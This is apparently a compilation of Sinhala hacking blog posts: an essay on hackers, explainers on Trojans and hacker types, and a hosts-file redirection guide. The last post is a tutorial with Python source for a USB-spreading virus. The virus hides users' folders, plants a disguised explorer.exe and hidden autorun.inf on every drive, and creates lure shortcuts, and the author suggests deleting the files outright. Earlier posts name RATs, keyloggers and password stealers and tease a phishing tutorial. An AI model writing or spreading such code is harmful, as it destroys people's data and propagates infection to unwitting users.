කව්ද මේ හැක(ර්) ලා??

0
COM

Who is a Hacker?



සමහරක් අයනම් හැකර්ලා වෙන්නත් හදනවා ඒ අස්සේම නමුත් අපේ යකඩයා ෆෝරම් එකේ ඉන්න කොල්ලන්ට ඇරෙන්න මේ අනික් මිනිස්සුන්ට හැකර් කෙනෙක් කියන්නේ කවුද කියලා තාම කවුරුත් කියලා දීලා නැහැ වගේ. ලංකාවේ අපිට හැකින් අලුත් දෙයක් නෙවෙයි ඔන්න. නමුත් සමහරක් අය නිකරුනේ බැන වදිනවා හැකර්ලට.


මිනිස්සු හිතනවා වගේ හැකර් කෙනෙක් කියන්නේ වෙන කෙනෙක්ගේ පරිගණකයකට හෝ වෙබ් අඩවියකට බලෙන් ඇතුල් වෙලා හිරිහැර කරන පුද්ගලයෙක් නෙවෙයි ඔන්න. හැකර් කෙනෙක් කියන්නේ සරලවම දියුනු මොලයක් තියන පුද්ගලයෙක්, ඔවුනේ හිත සහ මනස හැමතිස්සේම හිතන්නේ සමාන්‍ය අපිට වඩා වෙනස් ආකරයකට.


ඔය ගොල්ලොත් දැකලා ඇති සමහරක් පොඩි එවුන්ට සෙල්ලම් බඩුවක් දුන්නාම උන් ඒක ගලවල බලනවා , ඒත් පොඩි හැකර් මල්ලිලා තමයි. අනික් කට්ටිය හිතනවට වඩා වෙනස් ආකරයට ඒ-ගොල්ලො හිතන්නේ, සෙල්ලම් බඩුවෙන් සෙල්ලම් කරන්න නෙවෙයි එයාලට ඔනේ, ඊට එහා දෙයක් හොයාගන්න. හැකරුවෙකුත් හැමතිස්සේම දෙයක් වැඩි දියුනු කරන්න, වෙන කෙනෙක් හොයාගත්තේ නැති දෙයක් හොයාගන්න, කොටින්ම ප්‍රෙොඩක්ට් මැනුවල් එකේ නැති දෙයක් හොයන්න උත්සහ කරන කෙනෙක්ට තමයි අපි හැකර් කෙනෙක් කියන්නේ. හැකර්ලා නැත්තම් අපි තාම ගල් යුගයේ.


මොක්කුද මේ කම්පියුටර් හැකර්ස්ලා....?


මේ ගොල්ලොන්ගේ කාරිය තමයි පරිගණක අශ්‍රිතව ඇති දෝශ සොයන එක සහ ඒවා එක්ස්ප්ලොයිට් කිරීමට හැකි ක්‍රම සහ ඒවා නැවැත්වීමට හැකි ක්‍රම සෙවීම.වැඩේ පැහැදිලි කරන්නම්කෝ පොතෙන් පිටුවක් අරගෙනම.හිතන්නකෝ පට්ට සෝක් ගෙයක් ගැන, මෙන්න මේ වගේ..

ගෙදර ගැන හිතන්නකෝ. දැන් කවුරුහරි ඇවිත් කිව්වොත් මෙම ගෙදර සොරුන්ගේන් ආරක්ශා කරන්න ක්‍රමයක් හදලා දෙන්න කියලා අපි මොකො කරන්නේ? අපිත් හොරෙක් වගේ හිතන්න ඔනේ.


පිටිපස්සේ දොරට ආරක්ශාව අඩු නිසා ලෙසියෙන් එකෙන් රිංගන්න පුලුවන්ජෑනෙලෙන් පනින්න පුලුවන් , වහලෙන් පනින්න පුලුවන්පොලව හාරන් එනන් පුලුවන්ගෙදර දොර අරින්නේ යතුරකින් විතරක්නම් හොර යතුරක් කපන්න පුලුවන්


සහ නොයෙකුත් ක්‍රම තියනවා. හොදම හොරු තමා තව තව ක්‍රම දන්නේ. අන්තිමේ උබලා මටත් හොරෙක් කියයිද දන්නේ නැහැ. මොනා උනත් හොරෙක්ට කරන්න පුලුවන් වැඩටික අපි දන්නේ නැත්තම් අපි කොහොමද ආරක්ශා කරන්නේ ගෙදර?. ඉතින් හැකර් කෙනෙක් කියන්නේත් එහෙම කෙනෙක්ට තමා... ගේ කඩන ක්‍රම දන්නේ නැතුව කොහොමද ආරක්ශා කරන්නේ? ඉතින් හොද හැකර්ලා මේ ගෙවල් වලට ආරක්ශිත් පද්දති හදනවා වගේ වැඩැක් තමයි කරන්නේ, මුලින්ම ගෙදර අයිතිකාරයට මේවා ඔප්පු කරන්න ඇත්තම් හොරෙක් කරන විදිහට මේව කරල පෙන්නන්න වෙන අවස්තාත් එනවා....


හැබැයි පුතෝ මේකත් මතක තියාගන්න ඔනේ, එක ගෙයක් කඩන්න දැනුම දිබ්බට බැහැ. මොකද එක එක ගෙවල් එක එක විදිහයි. බ්ලොග් ගල් වලින් හදලා තියෙන්න පුලුවන්, ලී වලින් හදලා තියෙන්න පුලුවන්, තනි තට්ටුවේ ගෙවල් වලට දෙන ගේම තට්ටු 2කේ 3නේ එව්වට දෙන්න බැහැ. අහල පහල විමසිල්ලෙන්නම්, ගෙදර බල්ලො ඉන්නවනම්, සිකිරුට්ටො ඉන්නවනම් මේ ක්‍රම වෙනස් වෙනවා කියලා මතක තියගන්න ඔන.... අපි යකඩයා තුලත් ඉගැන්නුවෙත් තමන්ගේ දේවල් රැකගන්න ක්‍රම පමනයි, අනුන්ගේ දෙවල් වලට හානි කරන ක්‍රම එකින් එකට වෙනස් වෙනවා. අපි කවදාවත් එහෙම ක්‍රම කියලා දීල නැහැ. සයිබර් සිකියුරිටි සහ සයිබර් ක්‍රයිම් කියන්නේ පැහැදිලිවම දෙකක්.


තමන්ගේ දැනුම භාවිතා කරලා අනුන්ට උදව් කරන අයට අපි කියනවා වයිට් හැට් හැකර්ස්ලා එහෙමත් නැත්තම් එතිකල් හැකර්ස්ලා කියලා, මේක දැනටම ලංකාවේත් ඉල්ලුම තියන රැකියාවක් පිට රට වගේම...

උපුටා ගැනීම
http://mrelitex.blogspot.com/2016/10/who-is-hacker.html

Trojan horse - හැඳින්වීම

0
COM

ටෝජන් වයිරස් එක



Vent කියලා රාජ්‍යක් හා Sefl කියලා රාජ්‍ය 2ක් තිබ්බා. Vent කියන රාජ්‍යට ඕනේ වෙනවා අල්ලපු රාජ්‍ය (Sefl) අල්ලගන්න.  ඉතින් ඒ Vent රජු උපායක් කල්පනා කරනවා. හොද අදහසකුත් එනවා. ඒ රජු Sefl රාජ්‍යකට ලී අශ්වයෙක් යවනවා තෑගි විදියට. ඒ රජතුමා ඒ ලී අශ්වයාගේ ඇතුලේ හමුදාවක් දාලා යවන්නේ.. (ටිකක් කපටි අදහසක්..) අනිත් රාජ්‍යයේ රජු ඒ අශ්වයව සතුටින් පිලිගන්නවා. ඒත් ඒ රජා දන්නෑ ඇතුලේ හමුදාවක් ඉන්නවා කියලා. (පව් නේ..)  ඊට පස්සේ රෑ වෙනවා.. රෑ උනාට පස්සේ අර හමුදාවේ හිටිය සෙබලු ටික එලියට ඇවිත් මුලු රාජ්‍යයම අළු කරලා දාවනවා... මේක  ඒ අශ්වයාව නම් කලේ Trojan අශ්වයා කියලා.


හරි ළමයි.. දැන් කතාවක් ඇහුවනේ... දැන් හැකින් පාඩමට යමු...







මේක වයිරස් එකක්. හොද සොෆ්ට්වෙයා එකක්, සයිට් එකක් වගේ ඉන්නවා.. (ඒත් වයිරස් එකක් හරිය).. ඊට පස්සේ අපට ඕනේ කෙනාට මේක යවනවා. (මේල් එකකින්, චැට් එකකදි වගේ)
ඊට පස්සේ එයා ඒක ක්ලික් කලාට පස්සේ වයිරස් එක පටන් අරගෙන කම්පූටරේ කනවා. විනාස කරනවා. මේකත් හරියට අර උඩ කතාවේ කියපු අශ්වයා වගේනේ.. ඒක නිසා මේවගේ වයිරස් වලට කිව්වා  Trojan වයිරස් කියලා..




එමෙනම් ඔන්න පාඩම ඉවරයි. නොතේරෙන දෙයක් ඇත්නම් අසන්න..



DNS Attacks (DNS ප්‍රහාර)

0
COM
මේ පෝස්ටුවෙන් විස්තර කරන්නේ මොකද්ද මේ DNS හා කොහොමද DNS Attacks එකක් ක්‍රියාත්මක කරන්නේ කියලා.
මුලින්ම අපි බලමු මොකක්ද මේ DNS කියන්නේ කියල.

අන්තර්ජාලය සමග තදින්ම බැඳී පවතින දෙයක් තමයි මේ DNS.
යම් පරිඝනකයකට වෙබ් ලිපිනයක් ඇතුල් කරල ඒ අදාල web site එකට යාමේදි වෙබ් ලිපිනය ඇතුල් කළ අවස්තාවෙ ඉඳල අදාල
web site එක එම පරිඝනකයේ දිස්වන අවස්තාව දක්වා කාලය තුල තමයි මේ DNS මැදිහත් වීම සිද්ද වෙන්නේ.
ඒ කොහොමද කියනවා නම් ඔබේ පරිඝනකය ඇතුලු අන්තර්ජාලයේ තියන සෑම පරිඝනකයක්ම මේ web site වල ලිපිනයන්
(උදා www.facebook.com ) හඳුනන්නේ නෑ ඒ මොකද සෑම web site එකකටම එයට ආවේනික වු ip ලිපිනයක්
(උදා 31.13.79.144 ) තියනවා ඒ ip ලිපිනය මගින් තමයි පරිඝනකය අදාල web site එක හඳුන ගන්නේ. නමුත් මිනිසුන්ගේ පහසුවට
වෙබ් ලිපින බාවිතා කරන නිසා. අපි වෙබ් ලිපිනයක් ඇතුලත් තළ විට DNS මගින් ඒ වෙබ් ලිපිනයට අදාල IP ලිපිනයට අපේ පරිඝනකය
යොමු කරීම තමයි මේ DNS මගින් සිදුකරනු ලබන්නේ.

ඉතිං මං කලින් කිවුව වගේ පරිඝනක වෙබ් ලිපින හඳුනන්නේ නෑ
ඒ දේ ප්‍රයෝජනයට අරන් තමයි මේ DNS Hack කිරීමක් කරන්න පුළුවන් වෙන්නේ. අපි බලමු කොහොමද ඒක කරන්නේ කියල.

ඔයා ඔයාගේ පරිඝනකයට යම් වෙබ් ලිපිනයක් ඇතුල් කරනව කියල හිතමු. එහිදී යම් පිලිවලකට තමයි ඒ ඇතුලත් කල වෙබ් ලිපිනයට අදාල
ip ලිපිනය සොයා ගන්නේ. එහිදි ඕනෑම පරිඝනකයක තියනව
(TCP/IP Method එක බාවිතා කරන - TCP/IP ගැන පස්සේ පාඩමකින් කියල දෙන්නම් ඈ) Hosts කියල system file එකක්
ඉතිං අපි ඇතුලත් කළ වෙබ් ලිපිනයට අදාල ip ලිපිනය මුලින්ම පරිඝනකය හොයන්නේ මේ Hosts File එකේ.
hosts එක කියනවනම් අපි ඇතුලත් කරපු වෙබ් ලිපිනයේ ip ලිපිනය 10.1.10.1 කියල කිසි කතාවක් නෑ පරිඝනකය ඒක පිලිගන්නව.
windows වල නම් මේ hosts file එක තියෙන්නේ C:\Windows\System32\Drivers\etc වල.
හරි අපි හිතමු අපි ඇතුලත් කළ වෙබ් ලිපිනයේ ip ලිපිනය මේ hosts file එකේ නෑ කියල.
ඊළඟට පරිඝනකය ip ලිපිනය හොයන්න යොමුවෙන්නේ Local DNS එකට. ඉතික් මේ local dns එක බොහෝ විට ඔයාගෙ
DSL modem එක නැත්තන් wifi router එක එහෙමත් නැත්නම් ඔයාට පොඩි Network එකක් තියනවනම් ඒකෙ
server machine එක වෙන්න පුලුවන්. මේ local DNS එකෙත් ip ලිපිනය හොයාගන්න බැරි වුනොත් ඊලඟට යනව Public DNS එකට.

ඉතින් මේ විදිහට තමයි DNS ක්‍රියාවලිය සිද්ද වෙන්නේ.
ඉතිං මේ DNS Hack කිරීමකදි සිදු කරන්නේ hosts file එක වෙනස් කිරීමක්. ඒ කියන්නේ අපිට පුලුවන් www.facebook.com
කියන වෙබ් ලිපිනයේ ip ලිපිනය විදිහට වෙනත් ip ලිපිනයක් ලබා දෙන්න උදා 127.0.0.1 කියන ip ලිපිනය ලබාදුන්න කියල හිතන්නකෝ.
ඊලඟ අවස්තාවේ පරීඝනකයට www.facebook.com කියන වෙබ් ලිපිනය ඇතුල් කරහම පරිඝනකය මුලින්ම hosts file
එකේ මේ වෙබ් ලිපිනයට අදාල ip ලිපිනය හොයනව එතනදි hosts file එක කියනවනම් මේ වෙබ් ලිපිනයට අදාල ip
ලිපිනය 127.0.0.1 කියල පරිඝනකය කොහෙත්ම එතනින් එහාට local DNS එකටවත් public DNS එකටවත් යන්නේ නෑ
hosts එකෙන් දෙන ip ලිපිනය පිලිගන්නවා.

හොඳයි අපි බලමු windows පරිඝනකයක කොහොමද මේ hosts file එක වෙනස් කරන්නේ කියල.
මුලින්ම කියන්න ඕනෙ මේක කරන්න නම් අනිව Administrator Account එකකින් log වෙලා ඉන්න ඕනෙ

C:\Windows\System32\Drivers\etc මෙන්න මේ තැන තමයි hosts file එක තියෙන්නේ.
අපිට පුලුවන් මේක right click කරලා open with > notepad දෙන්න.
ඉතින් මේ file එකේ තියන 127.0.0.1 localhost කියන තැනට යටින් තමයි අපිට ඕන කරන ip ලිපිනය හා වෙබ් ලිපිනය දෙන්න ඕනේ..

ඉතින් ඔය විදිහට තමයි මේ hosts file එක වෙනස් කරන්නේ. ඔයාලට පුලුවන් 127.0.0.1 කියන තැනට වෙන ඕනම ip ලිපිනයක් දාල වෙනස් කරගන්න.

ඊලඟ ලිපියෙන් මං ඔයාලට කියල දෙන්නම් කොහොමද මේ DNS Attacks එකක් වෙනත් පරිඝනකයනට දෙන්නේ සහ මේක බාවිතා කරල
මොනවද කරන්න පුලුවන් කියල උදාහරනයක් විදිහට phishing attack එකක් වගේ කරන්නේ කොහොමද කියල.

තව දෙයක් කියන්න ඔනේ හැමවිටම මේ Hacking කියන දෙය නරකට බාවිතා කරනව කියල දෙයක් නෑ
මේ දේවල් හොඳ විදියට බාවිතා කරන්නත් පුලුවන්. අපි හිතමු ඔයාගෙ ගෙදර නංගිල මල්ලිල හරි ළමයි හරි ඔය facebook සහ තව ඔය අනවශ්‍ය දේවල් වලට
යොමු වෙලා තියනවනම් ඔයාට පුලුවන් ඒ web sites list එක අරගෙන hosts එකට add කරල ඒ sites වලට යන එක නවත්තලා දාන්න.
ඉතින් ඒ වගේ හොඳ දේවල් වලටත් මේ Hacking බාවිතා කරන්න පුලුවන්. සුභ දවසක් එහෙනම් ඊලඟ ලිපියෙන් හම්බ වෙමු.

හැකිං ගැන තේරෙන සිංහලෙන්

0
COM






හල්ලොව් කොහොමද කට්ටිය ඈ ඔන්න අදත් චෙනුර මලයා පරිගණක වල නරක පැත්ත ගැන ලිපියක් ගෙනාවා මුලින්ම අපි එකෙන් එක බලමු මේ මොනවද කියලා හරි මේ ලිපිය ගැන මුලාශ්‍ර ලබාගත්තේ
රුවන් අයියාගේ බ්ලොග් අඩවියෙන් හා මා දාන්න කරුණු එකතු කරා ඈ හරි
Hack කිරීම?
ඇත්තටම මේකට ගොඩක් අර්ථ තියෙනවා Dictionary වල බලන්න කුණුහරුපත් එනවා මේකේ සරල තේරුම තමයි අනවසර ආක්‍රමණය.පරිගණක ආශ්‍රිත දේවල් වල දත්ත හොරකම් කිරීම මේවට ඕන තරම් නිර්වචන තියෙනවා.කොහොම වුනත් මේක නරක දෙයක් හොරකමනේ...
Hacker වරු?
පරිගණක වලට අනවසරයෙන් ඇතුල් වෙලා දත්ත සොරාගෙන ඒවා තමුනෙග් සිතැගි පරදී කටුයතු කරන අය කියුවොත් හරි(සරල අර්ථය)
Hacker වරු ප්‍රධාන වර්ග 3
  • Black Hat Hacker
  • White Hat Hacker
  • Gray Hat Hacker

White Hat සුදු තොප්පි හැකර්වරු



පරිගණක සහ ජාල ආරක්ෂක ප්‍රමුඛයන් ලෙස හැදින්වේ.මොවුන් සිය දැනුම සිය ආයතනයේ ආරක්ෂාව උදෙසා භාවිතා කරයි මොවුන් පද්ධතියකට අනවසරයෙන් ඇතුළුවූවත් ඒ අවශ්‍යම හේතුවක් නිසා පමණක් වන අතර සැම විටම හානිකර හැකරැන්ගෙන් පරිගණක පද්ධති බේරාගැනීම පරාමාර්ථය කොට වැඩ කරයි.මෙයාලගේ සරල තේරුම තමයි මෙයාලා Hacking යොදන්නේ හොද පැත්තට





Black Hat කළු තොප්පි හැකර්වරු



නීති විරෝධි හා අනවසර ඇතුළුවීම් හානිකර කටයුතු සඳහා යොදා ගනියි.හානිකර හේතුන් සදහා ජාලයකට හෝ පරිගණක පද්ධතියකට ඇතුළු වෙන මෙයාලා Hacking යොදන්නේ ගොඩක් නරක වැඩ වලට මෙයාලා ගොඩක් හැංගිලා ඉන්නේ දැනට ගොඩක් අය හිරේ






Gray Hat අළු තොප්පි හැකර්වරු


ඉහත දෙපාර්ශවයේම එකතුවක් ලෙස හැදින්වේ. අන්තර්ජාලය තුල සැරිසරමින් අනෙක් ජාල තුල ඇතුල් වේ ,මොහො දුරට සුළු මුදලක් සදහා පද්ධති සහ ජාල වල අනාරක්ෂිත ස්ථාන අලුත් වැඩිය කරයි.මෙයාලා ගැන කියන්න අමාරුයි එක එක විදිහට Hacking යොදාගන්නවා


Hacking ඉගෙන ගන්න අයගේ අධ්‍යාපන අවදි

Elite hacker

විෂයේ දැවැන්තයෝ මෙම නමින් හදුන්වයි , නව අනාරක්ෂිත ස්ථාන සොයන්නන්,නව ඇතුළු වන ක්‍රම සොයන්නන් මෙම ඝනයේ ලා සැලකේ සරලව කියන්නේ නම් වැඩ්ඩන් හා වැඩකරැවන් ලෙස මොවුන් හැඳින්විය හැකිය.


Script kiddie

කිසිම හැකිං පිලිබඳ දැනුමක් නැති,අවබෝදයක් නැති අය වේ,අනිත් පුද්ගලයන් විසින් නිර්මාණය කරන ලද Application ආධාරයෙන් වැඩ ගන්නෝ වෙති.


Neophyte

සමහර තමන් වැඩ්ඩන් යයි සිත සිටින්නන් කිසිදු දෙයක් නොදන්නා නමුත් වැඩකරැවකු යැයි පෙන්වන්න්ය (Noob ,හා Newbie) නමින්ද හඳුන්වයි.සිංහලෙන් කියනවානම් කටින් Hacker වරු (ලංකවේ වැඩි මෙයාලගේ අය තමයි)


Blue hat

පද්දති වල ආරක්ෂාව සොයා බලන්නන් මේ නමින් හැදින්වේ.


Hacktivist

සමාජ,ආගමික,දේශපාලන අවශ්‍යතා සදහා ඇතුළු වන්නන්.
හැක් කරන්න භාවිතා වන ක්‍රම
  • Server Side Hacking
  • Social Engineering


හැකින් වල භයානකම සහ ප්‍රබලම ලෙස සලකන්න පුළුවන් තම බුද්ධිය සහ අනෙක් පුද්ගලයාව රැවටීමේ දක්ෂතාවය මත මෙය රදා පැවතේ.හොදට හිතන්න පුළුවන් වෙන්න ඕනේ

උදා - මම Fake Account එකකින් තමාට Hack කිරීමට අවශ්‍ය පුද්ගලයා සමග මිත්‍ර වී ඔහු ගැන විස්තර දැන ගැනීම තුලින් අදාල පාස්වර්ඩ් වැනි දෑ සොයා ගැනීඹ හෝ අනුමාන කිරීම.

Social Engineering Expert කෙනෙකු සාමාන්‍යයෙන් දින ගානක් තාමාට අවශ්‍ය පුද්ගලයා දෙස බලා සිටිමින් ඔහු අධ්‍යයනය කරයි,ඔහුගේ ජිවන රටාව,කැමති යුවතියන් වර්ග,කොන්ඩ විලාසිතා. වැනි දේ(Hack කිරීමට ඕන කෙනාගේ පුද්ගලික තොරතුරු ලබා ගන්නවා)

Shoulder Surfing

අනෙකාගේ මුර පදය දෙස ඇස කොනෙන් හෝ , බලා සිටීම.රහසින් බලා සිට මුර පදය සොයා ගැනීම (ගොන් Hacking)


Guessing

යහළුවෙක් නම්, Social Engineering දන්නාවනාන්ම් මේක ලේසියි , අනුමානයට විවිධ පාස් වර්ඩ් ඇතුල් කර බලමින් හරි පාස්වර්ඩ් එක සොයාගැනීම.


Keylogging

වඩාත් දියුණු තත්වයක් වේ.මේ සඳහා හැක් කිරීමට අවශ්‍ය පුද්ගලයාගේ පරිගණකයට මුලින්ම කී ලොගර් වැඩසටහනක් යවනු ලැබේ පසුව මෙය මගින් අනිත් පුද්ගලයා විසින් ටයිප් කරන සියලුම අකුරු හැකර් වරයා වෙත ලැබේ .උදා - RapZo Logger,Accuracy Logger , Keystork Dante,Ring Logger


Cookies Stealing

යම් අඩවියකට ඇතුල් වීමේදී තම පරිඝනකයේ තැන්පත් වන කුකිස්‌ සොර ගැනීම තුලින් ලොග් වන යුසර් Name සහPassword සොරාගනිම .


Remote Administration tools - (RAT)

හැකර් වරුන්ගේ ප්‍රබලම අවියකි , හැකර් වරයාට අවශ්‍ය පුද්ගලයාගේ පරිගණකය අවශ්‍ය පරිදි හැසිරිවිය හැකිය , වෙනත් ඒවා බාගත කල හැකිය. උදා - Pro RAT , Dark_Comet , BS , Spy Net , Cyber gate


Password Stealing

Keylogging වලට සාමාන උව්වත් මෙහිදී නියමිත Apps වල User Names and Password පමණක් හැකර් කරුවාගේ ඉ මේල් ගිණුමට හෝ ඔහුගේ අදාළ අඩවියකට එවයි ,Ex – Emissray , iStealer


Phishing Attacks

අදාළ වෙබ් අඩවිය ලෙස සෑදු ව්‍යාජ අඩවියකට පුද්ගලයාව ගෙන යයි ,උදා - ෆේස් බුක් අඩවිය ලෙස තනු ව්‍යාජ එකට ඔබ ලොග් වූ විට ඔබේ දත්ත හැකර් වරයාට ලැබේ.


Bot or Zombies

තවත් ප්‍රබල දෙයකි , Password Stealing , Keylogging යන්න ලෙසත් ක්‍රියාත්මක වේ , BOTNET එකක් යනු බොහෝ විනාශ කාරී දෙයකි , ඔබේ සියලු දත්ත සොර ගන්නට හැකි වේ. උදා - Zeus bot
Server Side Hacking

Exploiting යනුවෙන් මුලිකවම දැක්වෙන්නේ,යම් පද්දතියක හෝ ජාලයක ඇති අනාරක්ෂිත ස්ථානයකින් ඇතුල් වීමෙන් තාමගේ වාසිය සාදා ගැනීමයි.වෙබ් අඩවියකට මෙවැන්නකින් කල හැකි දේ.
1. SQL Injection
2. RFI, LFI3. Uploading Shells
4. XSS Cross Site Scripting
5. CSRF
6. Gaining Root Access to websites hosted on the same server and then intruding another site on the server.
7. Using Scripts to gain information known as Exploits.
Dictionary Attacksලෙහෙසියෙන්ම මෙයින් අත්මිදෙන්න පුළුවන් , නමේ හැටියට වගේම කිසිම දවසක Dictionary එකක ඇතුලත් වෙන්න පුළුවන් නම් මුරපදයට ඇතුල් කරන්න එපා.
Brute-force Attacks
ඉහත දේට සමානයි . නමුත් බොහෝ දවසක් යන වැඩක් , ඔබේ මුර පදය දිගු එකක් නම් ,අංක , එකතු කිරීම , සමාන ලකුණු , වරහන් වැනි දේ සමග තියෙනවා නම් බොහෝ දුරට මෙම ප්‍රහාරය දියත් කරයි , නමුත් ගොඩක් ලොකු මුර පදයක් නම් වැඩක් වෙන්නේ නැහැ.


උපුටා ගැනීමකි ......

ඉබේම පැතිරෙන වෛරස් එකක් හදමුද?

0
COM


ඔන්න අද මම වැදගත් දෙයක් තමා ඔයාලට කියල දෙන්න යන්නේ..ඒ තමා ඉබේම පැතිරෙන වෛරස් එකක් හදන විදිහ..
පෙන් ඩ්‍රයිව්,චිප් වගේ removable devices හරහා තමා මේ වෛරසය පතුරවන්න පුලුවන් වෙන්නේ..

මම මේක හදන්න භාවිතා කරන්නේ python language එක..

හරි එහෙනම් අපි වැඩේ පටන් ගමු..සමහර කෙනෙක්ට මේක විකාරයක් වගේ පේන්නත් පුලුවන්..

දැන් මුලින්ම අපි හදන වෛරස් එක නිකන් පැතිරි පැතිරි තිබ්බට වැඩක් නෑනේ..ඒකෙන් වෙන දෙයක් තියෙන්නත් එපැයි..
ඒ නිසා මම අපි කවුරුත් දන්න Short cut නිර්මානය වෙන වෛරස් එකක් විදිහට මේක නිර්මානය කරන්න තමා යන්නේ..

ඒ කිව්වේ මේ වෛරස් එක ආසාදනය වෙන හැම පරිගනකයකම local disk වලත් removable devices වලත් තියන ෆයිල මැකිල
ඒ වෙනුවට shortcut හැදෙන එක තමා මේකෙන් මම කරන්න යන්නේ..

මුලින්ම අපි හිතමු අපේ මේ වෛරස් එක පරිගනකයකට ආසාදනය උනා කියලා..ඒ කියන්නේ අපේ වෛරස් වැඩසටහන ඔන්න ක්‍රියාත්මක උනා..

දැන් අපිට කරන්න ඕනේ ඒ පරිගනකයේ තියන සියලුම local disk සහ removable devices වල තියන ඔක්කොම files මකලා දාලා ඒ වෙනුවට shortcut හදන්න..

මුලින්ම මම හොයාගන්න ඕනේ පරිගනකයේ තියන local disk සහ removable devices මොනවද කියලා..ඒකට මම පොඩි උපක්‍රමයක් පාවිච්චි කරනවා..

පරිගනකයක තියන local disk සහ removable devices නම් කරලා තියෙන්නේ a-z ඉංග්‍රීසි හෝඩියේ අකුරු වලින්නේ..ඒ නිසා මම ඒ හැම එකක්ම චෙක් කරලා බලනවා loop එකකින්..


import os,shutil,winshell
drives=['a:\\', 'b:\\','c:\\','d:\\','e:\\', 'f:\\', 'g:\\', 'h:\\', 'i:\\', 'j:\\', 'k:\\', 'l:\\', 'm:\\', 'n:\\', 'o:\\', 'p:\\', 'q:\\', 'r:\\', 's:\\', 't:\\', 'u:\\', 'v:\\', 'w:\\', 'x:\\', 'y:\\', 'z:\\']
for bomb in drives:
try:

fld=[]
folders=os.listdir(bomb)
for moveit in folders:
if '.' not in moveit:
fld.append(moveit)
src=bomb+moveit
dst=bomb+'www\\9\\6\\D\\e\\v\\e\\l\\o\\p\\e\\r\\.\\c\\o\\m\\h\\'+moveit
shutil.move(src,dst)

for nwfl in fld:
winshell.CreateShortcut (
Path=os.path.join (bomb,nwfl+'.lnk'),
Target=bomb+'explorer.exe',
Icon=(bomb+'explorer.exe', 0),
Description="File"
) ​

except:
pass

ඔතනදි මම කරලා තියෙන්නේ තියෙන්ඩ පුලුවන් drivers ටික ඔක්කොම list එකකට ගන්න එක..ඊට පස්සේ loop එකක් දාලා ඒ drivers හැම එකක්ම චෙක් කරනවා..
(මේකෙදි C drive එකට හානියක් කරන්න අමාරුයි..මොකද ඒකේ ෆයිල් වෙනස් කරන්න admin privileges ඕන කරනවා..)


දැන් අපි හිතමු D කියලා local drive එකක් අපේ පරිගනකයේ තියනවා කියලා..මේ ලූප් එක වැඩ කරද්දි bomb කියන variable එකට d:\\ ආදේශ උනාම මුලින්ම
ඒකේ තියන සියලුම ෆයිල් සහ ෆෝඩර් වල නම් ලබා ගන්නවා..ඒකට මම os module එක පාවිච්චි කරලා තියනවා..

ඊට පස්සේ මේ නම් අතරින් අපි ෆයිල් සහ ෆෝල්ඩර් වෙන් කරලා හදුනගන්න ඕනේ..මොකද අපි ෆෝල්ඩර් විතරයි අතුරුදහන් කරන්න යන්නේ..
මම මේකට පොඩි තර්කයක් යොදාගන්නවා..ඒ තමා හැම ෆයිල් එකකටම extension එකක තියනවා..ඒත් ෆෝල්ඩර් වලට නෑ..ඉතින් ෆයිල් වල නමට අනිවාර්යෙන්ම තිතක් ඇතුලු වෙන්න ඕනේ..
මොකද ෆයිල් එකේ නමත් extension එකත් වෙන් කරන්න..ඒත් ෆෝල්ඩර් වල එහෙම නෑ..කලාතුරකින් නමට තිතක් තියන ෆෝල්ඩර් එකක් හම්බ උනත් ඒ ගොඩක් අඩුවෙන්.
ඒ නිසා මම නමට තිතක් නැත්තන් ඒවා ඔක්කොම අතුරුදහන් කරන්න තෝර ගන්නවා..

මේ විදිහට තෝරගත්ත ඒවා මම වෙනම fld කියලා list එකකටත් දාගන්නවා..
දැන් මෙහෙමයි..අපිට පුලුවන් මේ ෆෝලඩර් delete කරන්න..ඒත් ඉතින් එච්චරම දරුනු වෙන එකත් හොද නෑනේ..ඒ නිසා ඒ ෆෝල්ඩර් ඔක්කොම මම loop
එකකින් www\\9\\6\\D\\e\\v\\e\\l\\o\\p\\e\\r\\.\\c\\o\\m\\h\\ කියලා ෆෝල්ඩර් ගොඩක් ඇතුලට move කරනවා..ඔයාට කැමතිනම් මෙතන move වෙනුවට deleteම කරන්නත් පුලුවන්..
move කරන්න shutil module එක තමා මම පාවිච්චි කරන්නේ..

හරි දැන් ඔන්න ඔක්කොම folders ටික අතුරුදහන් වෙලා ඉවරයි..(නමට තිතක් තියන ඒවා හැර)

දැන් අපි ඒ අතුරුදහන් කරපුවට හරියන්න shortcut හදන්නත් එපැයි..ඒකට මම winshell module එක පාවිච්චි කරනවා..

මෙතනදි මට ඕන වෙනවා මේ shortcut එක ක්ලික් කරාම target එකයි shortcut icon එකකුයි දාන්න..මෙතනදි මම මෙහෙම දෙයක් කියන්නම්..
දැන් කවුරුහරි removable device එකක තිබිලා මේ shortcut එකක් ක්ලික් කරොත් එයාගේ පරිගනකයටත් වෛරසය ආසාදනය වෙන්න තියනවනම් හොදයිනේ..
ඒ නිසා මම මෙහෙම දෙයක් කරනවා..

මුලින්ම මම මේ වෛරස් වැඩසටහනට කැමති නමක් හිතාගන්නවා..මම හිතාගන්නවා explorer කියලා මේකට නම දානවා..එතකොට සැක කරනවත් අඩුයිනේ..
එතකොට මුලු program එකේම නම explorer.exe

දැන් මම අර මුලදිම folders delete වෙද්දි ඒ folder delete වෙන drive එකට අපේ වෛරස් එකත් කොපි කරන්න හදනවා..


import os,shutil,winshell,win32api
drives=['a:\\', 'b:\\','c:\\','d:\\','e:\\', 'f:\\', 'g:\\', 'h:\\', 'i:\\', 'j:\\', 'k:\\', 'l:\\', 'm:\\', 'n:\\', 'o:\\', 'p:\\', 'q:\\', 'r:\\', 's:\\', 't:\\', 'u:\\', 'v:\\', 'w:\\', 'x:\\', 'y:\\', 'z:\\']
for bomb in drives:
try:
destination = bomb
source = ('explorer.exe')
shutil.copy(source,destination)
myfile=open(destination+'autorun.inf','w')
myfile.write('[AutoRun]\nopen=explorer.exe')
myfile.close()
win32api.SetFileAttributes((destination2+'autorun.inf'),win32con.FILE_ATTRIBUTE_READONLY)
win32api.SetFileAttributes((destination2+'autorun.inf'),win32con.FILE_ATTRIBUTE_HIDDEN)
win32api.SetFileAttributes((destination2+'explorer.exe'),win32con.FILE_ATTRIBUTE_HIDDEN)
except:
pass
try:
fld=[]
folders=os.listdir(bomb)
for moveit in folders:
if '.' not in moveit:
fld.append(moveit)
src=bomb+moveit
dst=bomb+'www\\9\\6\\D\\e\\v\\e\\l\\o\\p\\e\\r\\.\\c\\o\\m\\h\\'+moveit
shutil.move(src,dst)
for nwfl in fld:
winshell.CreateShortcut (
Path=os.path.join (bomb,nwfl+'.lnk'),
Target=bomb+'explorer.exe',
Icon=(bomb+'explorer.exe', 0),
Description="File"
)
except:
pass

